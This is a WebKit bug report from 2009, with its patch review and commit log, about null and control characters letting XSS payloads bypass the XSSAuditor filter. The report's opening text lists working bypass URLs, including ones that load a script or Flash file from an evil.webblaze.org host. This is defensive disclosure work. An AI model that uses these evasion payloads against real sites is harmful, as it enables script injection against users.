RESOLVED FIXED 27151
[XSSAuditor] JavaScript URLs with null/control characters bypass XSSAuditor 
https://bugs.webkit.org/show_bug.cgi?id=27151
Summary [XSSAuditor] JavaScript URLs with null/control characters bypass XSSAuditor
Daniel Bates
Reported 2009-07-10 11:16:17 PDT
Null/control characters in HTTP GET/POST data can bypass XSSAuditor with respect to JavaScript URLs. Examples: JavaScript URL with Null Character: http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aal%00ert%28/XSS/%29%3EContinue%3C/a%3E JavaScript URL with Control Character: http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aalert%28/XSS%05/%29%3EContinue%3C/a%3E +++ This bug was initially created as a clone of Bug #27071 +++ Null/control characters in HTTP GET/POST data can bypass XSSAuditor with respect to injected plugin-based objects, inline event handlers, and external scripts. Examples: Plugin-Injection: http://good.webblaze.org/dbates/xsstest.php?q=%3Cobject%20classid=%22clsid:d27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase=%22http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab%22%20id=%22flashMov%22%3E%3Cparam%20name=%22movie%22%20value=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20name=%22flashMov%22%20allowScriptAccess=%22always%22%20type=%22application/x-shockwave-flash%22%20/%3E%3C/object%3E Inline Event Handler: http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E External Scripts: http://good.webblaze.org/dbates/xsstest.php?q=<script src='http://evil.webblaze.org/dbates/xss.js'></script>
Attachments
Patch with tests (10.74 KB, patch)
2009-07-10 11:20 PDT, Daniel Bates 		abarth: review-
DetailsFormatted DiffDiff
Updated patch with tests. (11.84 KB, patch)
2009-07-10 13:35 PDT, Daniel Bates 		abarth: review+
DetailsFormatted DiffDiff
Show Obsolete (1) View All Add attachment proposed patch, testcase, etc.
Daniel Bates
Comment 1 2009-07-10 11:20:23 PDT
Created attachment 32565 [details] Patch with tests
Adam Barth
Comment 2 2009-07-10 13:16:57 PDT
Comment on attachment 32565 [details] Patch with tests This looks good, but can you make the same change to the V8 bindings in WebCore/bindings/v8?
Daniel Bates
Comment 3 2009-07-10 13:35:23 PDT
Created attachment 32573 [details] Updated patch with tests. I made the changes in the V8 bindings, but how do I test it? Also, moved line "const String* savedSourceURL = m_sourceURL;" to its original place in file WebCore/bindings/js/ScriptController.cpp.
Adam Barth
Comment 4 2009-07-10 13:39:27 PDT
Comment on attachment 32573 [details] Updated patch with tests. This looks good. To test the V8 bindings, you need a Chromium build. I'll watch the chromium build bot to make sure it works fine.
Daniel Bates
Comment 5 2009-07-10 13:41:16 PDT
Thanks. (In reply to comment #4) > (From update of attachment 32573 [details]) > This looks good. To test the V8 bindings, you need a Chromium build. I'll > watch the chromium build bot to make sure it works fine.
Adam Barth
Comment 6 2009-07-10 18:32:05 PDT
Sending LayoutTests/ChangeLog Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char.html Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char.html Adding LayoutTests/http/tests/security/xssAuditor/javascript-link.html Adding LayoutTests/http/tests/security/xssAuditor/resources/echo-intertag-click-and-notify.pl Sending WebCore/ChangeLog Sending WebCore/bindings/js/ScriptController.cpp Sending WebCore/bindings/v8/ScriptController.cpp Sending WebCore/page/XSSAuditor.cpp Sending WebCore/page/XSSAuditor.h Transmitting file data ............. Committed revision 45741. http://trac.webkit.org/changeset/45741
Note You need to log in before you can comment on or make changes to this bug.